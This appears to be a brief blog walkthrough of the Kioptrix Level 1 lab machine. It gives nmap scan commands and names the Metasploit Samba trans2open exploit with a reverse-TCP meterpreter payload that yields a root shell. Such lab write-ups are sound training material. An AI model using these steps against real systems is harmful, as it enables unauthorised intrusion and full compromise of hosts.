Kioptrix : level 1 (#1)

Lab Environment


Attacker’s Machine : Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux


Vulnerable Machine : Kioptrix: level 1(#1)


Let’s start hacking and breach the security of this machine


Scanning Phase :


Now let’s scan our local network to which attacking machine and vulnerable machine is connected.
      Syntax used : arp-scan -l
                  Victim machine : 192.168.113.129




Enumeration Phase :


I used nmap for further enumeration of ports and it’s services
Syntax used to scan all ports : nmap -p- 192.168.113.129 -Pn
Syntax used to scan services : nmap -sSCV 192.168.113.129 -Pn






I found http service active on port 80 and samba on port 139
So, I tried to visit the webpage if I can get something useful but no luck this time


Now I tried to search the exploit for samba and found one based on linux, freebsd and solaris , but I needed for linux .




Using samba exploit : exploit/linux/samba/trans2open
Setting options for the same exploit
Syntax used : set rhosts 192.168.113.129
Set payload linux/x86/meterpreter/shell_reverse_tcp


Then I simply typed exploit to run the exploit and I got command shell opened and typed whoami  to know the user and it’s root .



Popular posts from this blog

Calculat3 M3 | CTF Learn

TryHackme: Blue Walkthrough

CTF - Dina : 1.0.1 walkthrough